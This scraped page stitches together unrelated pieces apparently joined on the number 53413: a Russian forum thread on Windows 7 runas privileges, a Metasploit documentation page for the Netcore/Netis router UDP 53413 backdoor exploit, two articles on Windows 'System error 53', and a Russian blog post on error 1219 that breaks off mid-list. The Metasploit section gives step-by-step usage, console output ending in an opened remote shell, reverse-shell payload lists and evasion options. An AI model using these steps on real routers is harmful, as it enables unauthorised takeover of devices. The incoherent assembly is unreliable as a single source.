System error 53413 has occurred

Windows 7
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  • Windows 7

    Пользователь user1 является членом группы Администраторы. Пользователь user2 является Обычным пользователем.

    1. Заходим в систему под пользователем user2.

    2. Выполняем команду cmd.

    3. В открывшейся панели выполняем команду

    runas /user:имяКомпьютераuser1 cmd

    4. Открывается новая консоль. Консоль должна работать с правами Администратора, и все команды в ней исполняемые так же должны выполняться с правами Администратора.

    5. Набираем в «новой» консоли, открытой с правами пользователя user1

    net localgroup Администраторы user2 /ADD

    6. Получаем

    System error 5 has occurred.
    Access is denied.

    А Windows XP данная техника работает, почему не работает в Windows7?

    Вот что еще замечено. Если в консоли п.4 запускать secpol или gpedit, то они запускаются как и положено с правами Администратора! а вот net localgroup запустить не удается!

    Как быть?


  • Запуск CMD Run As Administrator это понятно и это работало.

    Теперь понял, запуск cmd через Run as different user не повышает привилегии… есть обходные пути в виде PowerShell-скрипта, который уже делает запрос на повышение привилегий… либо опять же через Run as administrator,
    если пользователь не обладает правами локального администратора — в таком случае всё будет ок… повторюсь — эти ограничения работают только в интерактивном режиме: при гранулярном тестировании скриптов в интерактивной сессии будут ошибки

    • Предложено в качестве ответа

      10 февраля 2011 г. 10:54

    • Помечено в качестве ответа
      Vinokurov Yuriy
      16 февраля 2011 г. 11:33

msf exploit(netcore_udp_53413_backdoor) > info

       Name: Netcore Udp 53413 Backdoor
     Module: exploit/linux/misc/netcore_udp_53413_backdoor
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-08-25

Provided by:

Available targets:
  Id  Name
  --  ----
  0   MIPS Little Endian
  1   MIPS Big Endian

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST      yes       The target address
  RPORT    53413            yes       The target port
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Payload information:

  Routers manufactured by Netcore, a popular brand for networking
  equipment in China, have a wide-open backdoor that can be fairly
  easily exploited by attackers. These products are also sold under
  the Netis brand name outside of China. This backdoor allows
  cybercriminals to easily run arbitrary code on these routers,
  rendering it vulnerable as a security device.

msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian

msf exploit(netcore_udp_53413_backdoor) > set RHOST
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened ( -> at 2016-05-16 00:52:43 -0500


This page contains detailed information about how to use the exploit/linux/misc/netcore_udp_53413_backdoor metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

  • Module Overview
    • Module Ranking and Traits
    • Basic Usage
    • Required Options
  • Knowledge Base
      • Vulnerable Devices
      • Lab Emulation
    • Verification Steps
    • Exploitability
    • Scenarios
  • Msfconsole Usage
    • Module Options
    • Advanced Options
    • Exploit Targets
    • Compatible Payloads
    • Evasion Options
  • Error Messages
  • Related Pull Requests
  • References
  • See Also
  • Authors
  • Version

Module Overview

Name: Netcore Router Udp 53413 Backdoor

Module: exploit/linux/misc/netcore_udp_53413_backdoor

Source code: modules/exploits/linux/misc/netcore_udp_53413_backdoor.rb

Disclosure date: 2014-08-25

Last modification time: 2020-10-02 17:38:06 +0000

Supported architecture(s):

Supported platform(s):

Target service / protocol:

Target network port(s): 53413

List of CVEs:

Routers manufactured by Netcore, a popular brand for
networking equipment in China, have a wide-open backdoor
that can be fairly easily exploited by attackers. These
products are also sold under the Netis brand name outside of
China. This backdoor allows cyber criminals to easily run
arbitrary code on these routers, rendering it vulnerable as
a security device. Some models include a non-standard echo
command which doesn’t honor -e, and are therefore not
currently exploitable with Metasploit. See URLs or module
markdown for additional options.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can’t (or doesn’t) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use exploit/linux/misc/netcore_udp_53413_backdoor
msf exploit(netcore_udp_53413_backdoor) > exploit

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax ‘file:<path>’

Knowledge Base

Vulnerable Devices

Trend Micro lists «almost all» models as being vulnerable in August 2014.

Vulnerable AND Exploitable:

  1. Netcore NI360 second-generation

Vulnerable, but not Exploitable via this module (details later):

  1. Netis WF2414 firmware V1.4.27001

Lab Emulation

  1. Install qemu
  2. Download and install mipsel. Please read the tutorial
  3. Starts the mipsel lab
    1. qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1 console=tty0" -net nic -net user,hostfwd=tcp::22222-:22,hostfwd=udp::53413-:53413
  4. Put vuln_squashfs-root.tar.gz to mipsel lab, extract it.
    1. scp -P22222 vuln_squashfs-root.tar.gz [email protected]:/root
    2. tar xvf vuln_squashfs-root.tar.gz
  5. Run vuln programs.
    1. cd nw614 && chroot . /bin/igdmptd

Verification Steps

  1. Install the emulator/hardware
  2. Start msfconsole
  3. Do: use exploits/linux/misc/netcore_udp_53413_backdoor
  4. Do: set RHOST <ip>
  5. Do: check
  6. Do: exploit
  7. You should get a shell.


As previously noted, some modules are vulnerable, but not currently exploitable via Metasploit.
During testing it was discovered that some modules implement an echo command that does not honor -ne. While it may be possible to still execute a shell, further investigation would need to be conducted.
In these cases, it should be possible to use other scripts to act as a fake interactive shell.


The following is an example of a vulnerable AND EXPLOITABLE router.

use exploits/linux/misc/netcore_udp_53413_backdoor
msf exploit(netcore_udp_53413_backdoor) > set RHOST
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened ( -> at 2016-05-16 00:52:43 -0500


The following is an example of a vulnerable but NOT expoitable router.

msf > use exploits/linux/misc/netcore_udp_53413_backdoor
msf exploit(netcore_udp_53413_backdoor) > set rhost
rhost =>
msf exploit(netcore_udp_53413_backdoor) > check

[+] Backdoor Unlocked
[*] Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.
[*] The target service is running, but could not be validated.

Go back to menu.

Msfconsole Usage

Here is how the linux/misc/netcore_udp_53413_backdoor exploit module looks in the msfconsole:

msf6 > use exploit/linux/misc/netcore_udp_53413_backdoor

[*] No payload configured, defaulting to linux/mipsle/meterpreter/reverse_tcp
msf6 exploit(linux/misc/netcore_udp_53413_backdoor) > show info

       Name: Netcore Router Udp 53413 Backdoor
     Module: exploit/linux/misc/netcore_udp_53413_backdoor
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-08-25

Provided by:
  h00die <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   MIPS Little Endian
  1   MIPS Big Endian

Check supported:

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    53413            yes       The target port (TCP)
  SRVHOST          yes       The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  TIMEOUT  1000             yes       The socket response timeout in milliseconds
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:

  Routers manufactured by Netcore, a popular brand for networking 
  equipment in China, have a wide-open backdoor that can be fairly 
  easily exploited by attackers. These products are also sold under 
  the Netis brand name outside of China. This backdoor allows cyber 
  criminals to easily run arbitrary code on these routers, rendering 
  it vulnerable as a security device. Some models include a 
  non-standard echo command which doesn't honor -e, and are therefore 
  not currently exploitable with Metasploit. See URLs or module 
  markdown for additional options.


Module Options

This is a complete list of options available in the linux/misc/netcore_udp_53413_backdoor exploit:

msf6 exploit(linux/misc/netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    53413            yes       The target port (TCP)
   SRVHOST          yes       The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   TIMEOUT  1000             yes       The socket response timeout in milliseconds
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (linux/mipsle/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian

Advanced Options

Here is a complete list of advanced options supported by the linux/misc/netcore_udp_53413_backdoor exploit:

msf6 exploit(linux/misc/netcore_udp_53413_backdoor) > show advanced

Module advanced options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CMDSTAGER::DECODER                       no        The decoder stub to use.
   CMDSTAGER::FLAVOR       auto             no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write, echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequest, psh_invokewebrequest)
   CMDSTAGER::SSL          false            no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                          no        Writable directory for staged files
   CPORT                                    no        The local client port
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (linux/mipsle/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the linux/misc/netcore_udp_53413_backdoor module can exploit:

msf6 exploit(linux/misc/netcore_udp_53413_backdoor) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   MIPS Little Endian
   1   MIPS Big Endian

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/netcore_udp_53413_backdoor exploit:

msf6 exploit(linux/misc/netcore_udp_53413_backdoor) > show payloads

Compatible Payloads

   #   Name                                            Disclosure Date  Rank    Check  Description
   -   ----                                            ---------------  ----    -----  -----------
   0   payload/generic/custom                                           normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                   normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/mipsle/exec                                        normal  No     Linux Execute Command
   4   payload/linux/mipsle/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   5   payload/linux/mipsle/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   6   payload/linux/mipsle/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   7   payload/linux/mipsle/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   8   payload/linux/mipsle/reboot                                      normal  No     Linux Reboot
   9   payload/linux/mipsle/shell/reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   10  payload/linux/mipsle/shell_bind_tcp                              normal  No     Linux Command Shell, Bind TCP Inline
   11  payload/linux/mipsle/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options

Here is the full list of possible evasion options supported by the linux/misc/netcore_udp_53413_backdoor exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/misc/netcore_udp_53413_backdoor) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

  • Router backdoor triggered, but non-exploitable echo command detected. Not currently exploitable with Metasploit.

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Router backdoor triggered, but non-exploitable echo command detected. Not currently exploitable with Metasploit.

Here is a relevant code snippet related to the «Router backdoor triggered, but non-exploitable echo command detected. Not currently exploitable with Metasploit.» error message:

99:	    resp_str = resp.join(',')
100:	    # check if we got a good response back
101:	    if resp.length >= 1 && resp_str.include?("x00x00x00x05") && resp_str.include?(tmp_file)
102:	      # some routers have a non-standard echo which doesn't support -en, so we need to detect that
103:	      if resp_str.include?('en ')
104:	        print_status('Router backdoor triggered, but non-exploitable echo command detected.  Not currently exploitable with Metasploit.')
105:	        Exploit::CheckCode::Detected
106:	      else
107:	        Exploit::CheckCode::Vulnerable
108:	      end
109:	    else

Go back to menu.

  • #14213 Merged Pull Request: Add disclosure date rubocop linting rule — enforce iso8601 disclosure dates
  • #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings


  • CVE: Not available

See Also

Check also the following modules related to this module:

  • exploit/linux/misc/accellion_fta_mpipe2
  • exploit/linux/misc/aerospike_database_udf_cmd_exec
  • exploit/linux/misc/asus_infosvr_auth_bypass_exec
  • exploit/linux/misc/cisco_rv340_sslvpn
  • exploit/linux/misc/cve_2020_13160_anydesk
  • exploit/linux/misc/cve_2021_38647_omigod
  • exploit/linux/misc/gld_postfix
  • exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce
  • exploit/linux/misc/hikvision_rtsp_bof
  • exploit/linux/misc/hp_data_protector_cmd_exec
  • exploit/linux/misc/hp_jetdirect_path_traversal
  • exploit/linux/misc/hplip_hpssd_exec
  • exploit/linux/misc/hp_nnmi_pmd_bof
  • exploit/linux/misc/hp_vsa_login_bof
  • exploit/linux/misc/ib_inet_connect
  • exploit/linux/misc/ib_jrd8_create_database
  • exploit/linux/misc/ib_open_marker_file
  • exploit/linux/misc/ib_pwd_db_aliased
  • exploit/linux/misc/igel_command_injection
  • exploit/linux/misc/jenkins_java_deserialize
  • exploit/linux/misc/jenkins_ldap_deserialize
  • exploit/linux/misc/lprng_format_string
  • exploit/linux/misc/mongod_native_helper
  • exploit/linux/misc/nagios_nrpe_arguments
  • exploit/linux/misc/netsupport_manager_agent
  • exploit/linux/misc/nimbus_gettopologyhistory_cmd_exec
  • exploit/linux/misc/novell_edirectory_ncp_bof
  • exploit/linux/misc/opennms_java_serialize
  • exploit/linux/misc/qnap_transcode_server
  • exploit/linux/misc/quest_pmmasterd_bof
  • exploit/linux/misc/saltstack_salt_unauth_rce
  • exploit/linux/misc/sercomm_exec
  • exploit/linux/misc/tplink_archer_a7_c7_lan_rce
  • exploit/linux/misc/ueb9_bpserverd
  • exploit/linux/misc/zabbix_server_exec

  • Nixawk
  • h00die <[email protected]>


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

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  • MiniTool

  • MiniTool News Center

  • How to Fix the “System Error 53 Has Occurred” Error on Windows?

By Daisy | Follow |
Last Updated October 25, 2019

google search

A lot of users have been facing the “system error 53 has occurred” error on their network-connected computers. In this post, I will list some of the reasons due to which this error is triggered and also provide viable methods to fix it completely. You can read this post from MiniTool to get the details.

Reasons for the “System Error 53 Has Occurred” Error

Here are some main reasons for the “system error 53 has occurred” error:

1. Connection Issue

2.Background Applications

3. Security Software

4. Incorrect Share Folder Command

5. Disabled Sharing

Then I will introduce how to fix the “system error 53 has occurred” error.

How to Fix the “System Error 53 Has Occurred” Error

Method 1: Use the Correct Share Command

In most cases, an incorrect share command can cause the “system error 53 has occurred” error. The correct method of sharing is as follows:

Step 1: Press the Windows + R keys together to open the Run dialogue box.

Step 2: Type cmd and click OK to open Command Prompt.

Step 3: Type the following share command: net use F: \servershare name.

type the share command

Then you can check to see if the “system error 53 has occurred” error still exists after you use this format. If it still exists, you can try the next method.

Method 2: Run Ping Test

The correct way to identify if the network server is working properly is to ping the server and check if there is a response. Here are the steps:

Step 1: Open Command Prompt again and type the following command to ping the server/computer in question:

ping (IP address of the server)

Step 2: If the Ping command returns all packets and no packets are lost, it means your network is set up correctly. However, if an error occurs or you do not receive a response when pinging the server, the connection settings are incorrect.

Step 3: Troubleshoot according to the results of the ping test.

Then you can check if the “system error 53 has occurred” has been fixed. If not, you can try the next method.

Method 3: Disable Security Software

Then you can try disabling the security software and check if it was causing the issue. If you find the issues, you should disable the security software, you can read this post — 3 Ways to Disable Windows Defender Antivirus on Windows 10.

Method 4: Check Networking in Safe Mode

If all of the methods above don’t work, you should check the network in Safe Mode. In this step, your computer will be put in safe mode to determine whether an application is causing this problem. For that:

Step 1: In the Start menu, press shift and click restart at the same time to enter the WinRE.

Step 2: You should choose Troubleshoot in Choose an option, and then choose Advanced options.

Step 3: Choose Enable Safe Mode with Networking in Advanced options and wait for the computer to startup.

Choose Enable Safe Mode with Networking

Step 4: Check to see if “system error 53 has occurred” error exists in this mode.

If it doesn’t, it means that a background application was causing the issue all along. Either reinstall that application or keep it disabled.

Final Words

That is all information on how to fix the “system error 53 has occurred” error. In the post, you can also learn about the reasons for this error. I hope this post can be helpful to you.

About The Author


Position: Columnist

She was graduated from the major in English. She has been the MiniTool editor since she was graduated from university. She specializes in writing articles about backing up data & systems, cloning disks, and syncing files, etc. She is also good at writing articles about computer knowledge and computer issues. In daily life, she likes running and going to the amusement park with friends to play some exciting items.

Windows is one of the most popular operating systems out there with more than a billion users. It provides users with the ability to link their computers through a network. However, quite recently, a lot of users have been facing the “System 53 Error has Occurred” Error on their network-connected computers. This issue has mainly been common with the older operating systems.

System 53 Error has Occurred

In this article, we will discuss some of the reasons due to which this error is triggered and also provide viable solutions to fix it completely. Make sure to follow the steps accurately and in the same order in which they are presented to avoid conflict.

What Causes the “System 53 Error has Occurred” Error?

After receiving numerous reports from multiple users, we decided to investigate the issue and devised a set of solutions to fix it completely. Also, we looked into the reasons due to which it is triggered and listed them as follows.

  • Connection Issue: There is a possibility that the two computers might not have been connected properly or the network through which they are connected is facing issues. If this is the case, the problem can be with the ethernet cable, the router or the configuration between the computers. These issues need to be checked and resolved through troubleshooting different options.
  • Security Software: In some cases, the security software installed on either of the two computers might be preventing the connection between the two computers. Security software can detect the connection as harmful and block it entirely due to which this error can be triggered.
  • Background Applications: Some background applications/tasks can also prevent the connection from being established properly. These background processes can interfere with important system functions and one of those functions might be the networking function.
  • Disabled Sharing: In some cases, the sharing of files and folders might be disabled on the computer or the network card. This setting can be configured in the control panel and it needs to be enabled in order for the connection to be established properly.
  • Incorrect Share Folder Command: With the majority of users, the issues were occurring due to an incorrect command being executed during sharing. It is recommended that you use the correct command with the appropriate format to share the folder.

Now that you have a basic understanding of the nature of the problem, we will move on towards the solutions. Make sure to implement these in the specific order in which they are presented to avoid conflict.

Solution 1: Using the Correct Share Command

In most cases, the issue occurs due to an incorrect share command which triggered this error. The command should display the address of the server and the folder to be shared in commas and most users forget this, due to which the issue is triggered. The correct method of sharing is:

  1. Press “Windows” + “R” to open the Run prompt.
  2. Type in “cmd” and press “Enter” to open Command Prompt.
    Running Command Prompt
  3. Type in your share command in the following format.
    net use F: "\servershare name"
  4. Check to see if the issue persists after you use this format.

Solution 2: Running Ping Test

The correct way to identify if the network server is working properly is to ping the server and check if there is a response. In this test, we will also check if there is packet loss which can also trigger this error. To run a ping test:

  1. Press “Windows” + “R” to open the Run prompt.
  2. Type in “Cmd” and press “Enter”.
    Running Command Prompt
  3. Type in the following command to ping the server/computer in question.
    ping (IP address of the server)

    Result of the ping command
  4. If the Ping command returns all the packets and there isn’t any packet loss it means that your network is set up correctly. But, if the response isn’t received or there is an error while pinging the server, it means that the connection hasn’t been set up correctly.
  5. Troubleshoot according to the results of the ping test.

Solution 3: Disabling Security Software

If the ping test returned a good response and the computer was being detected, it is time to disable the security software and check if it was causing the issue. Sometimes, the Antivirus installed on the computer can prevent the user from accessing the folder on a network. Therefore, disable your Antivirus and check if the connection between the computers is made and the files can be accessed on the network.

Solution 4: Enabling Sharing

In some cases, the sharing of files and hardware between computers might be disabled from the control panel. Therefore, in this step, we will be changing that setting and enabling the sharing between computers. For that:

  1. Press “Windows” + “R” to open the Run prompt.
  2. Type in “Control Panel” and press “Enter” to open it.
    Opening Control Panel
  3. Click on the “Network and Internet Settings” option and select the “Network and Sharing Center” button.
  4. Click on the “Change Advanced Sharing Settings” option.
    Clicking on “Change Advanced Sharing Options” button
  5. Click on All Dropdowns in the setting menu and check the “Turn On Network Discovery” and “Turn On Printer and File Sharing” options.
    Configuring the File Sharing and the Network Discovery Options

    Note: You must enable this for both “Guest and Private” Networks.

  6. Click on “Apply” to save your changes and close the window.
  7. Check to see if the issue persists.

Solution 5: Checking in Safe Mode

In this step, we will be putting the computer in safe mode to determine whether an application is causing this problem. For that:

  1. Restart the computer and immediately start pressing the “F8” key rapidly.
  2. Wait for the boot options screen to appear and select the “Advanced Boot Options” option.
  3. Select “Safe Mode With Networking” and wait for the computer to startup.
    Selecting the “Safe Mode With Networking” option
  4. Check to see if the issue exists in this mode.
  5. If it doesn’t, it means that a background application was causing the issue all along. Start disabling applications one by one and notice the one which makes the issue go away. Either reinstall that application or keep it disabled.

Photo of Kevin Arrows

Kevin Arrows

Kevin is a dynamic and self-motivated information technology professional, with a Thorough knowledge of all facets pertaining to network infrastructure design, implementation and administration. Superior record of delivering simultaneous large-scale mission critical projects on time and under budget.

Вычислительная техника всегда полностью детерминирована. В ней нет полурешений или частичных ответов. Есть только нули, есть только единицы. И если что-то не работает, то оно не работает всегда и по вполне выявимой причине. Примерно так полагали отцы-основатели храма компьютера. А потом в вычислительном блоке завелись тараканы, маленькие такие жучки, которые стохастически бегали и замыкали контакты, что приводило к ошибкам, возникающим случайным образом, к ошибкам, которые не укладываются в детерминированную, жесткую модель двоичной вычислительной техники.

С тех пор не перфолент было испорчено, а программно-аппаратные комплексы, компьютеры с которыми мы работаем, стали на несколько десятков порядков более сложными. И ошибки в них возникают порой настолько экзотические, что решить их зачастую практически невозможно, так как легче переустановить заново Windows и сбросить Linux.

Перфолента винтажная

Перфолента винтажная

Именно о такой «ошибке» и пойдет дальше речь. Действие происходит в среде операционной системы Windows 10. Разрядность или редакция системы не имеет значения. При попытке подключения к сервису Samba удаленного сервера в локальной сети на Linux при использовании команды net use возникает ошибка множественного доступа:

System error 1219 has occurred.

Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.

Ошибка будет возникать и при попытке подключиться к «расшареной папке» на удаленном сервере обычным проводником. Гугленье по номеру и описанию ошибки ни к каким позитивным результатам не приводит, так как ошибка настолько старая, что даже ссылки на базу знаний Microsoft ведут на страницу ошибки об отсутствии ошибки, а не на описание того, как с появившейся бедой справиться.

В моем случае я пытался подключать сетевой диск из командного файла. Операция проводилась командой:

NET USE B: \ BU2 /user:BUS /persistent:no

Где в качестве диска B: примонтировывалась папка BU с сервера, заданного IP-адресом При этом подключение осуществлялось под пользователем BUS с паролем BU2. И подключение существовало до перезагрузки (или его можно было отключить командой NET USE B: /DELETE).

Но, начнем по порядку. Давным-давно, по причинам ведомым одним только разработчикам, да архитекторам Microsoft, сетевые подключения к сервисам удаленный папки (та самая Samba) жестко ограничивались только одним пользователем на один сервер. Что это значит? Это значит, что на один сервер можно подключиться только под одной парой Login/Password. И если вы уже открыли один такой сеанс и не отключились от него (а Windows обычно не отключает соединение, чтобы потом не тратить время на его подключение заново), то при второй попытке подключиться к этому же серверу возникает как раз ошибка 1219. Собственно, описание проблемы и способ ее решения приводится непосредственно при выводе кода 1219. Дескать надо убрать другие подключения, тогда все заработает.

Многие «решения» и советы в сети сводятся примерно к следующему:

1. Перезагрузиться. Самый универсальный совет. И таки да, все заработает, если, конечно, у вас нет какого-либо автоматического подключения к удаленному серверу по Samba в автозагрузке. (По этому поводу встречался и совсем экзотический вариант по перезагрузке сервиса Workstation, дескать быстрее, да и все остальное не закроется, но это уже какой-то Overkill).

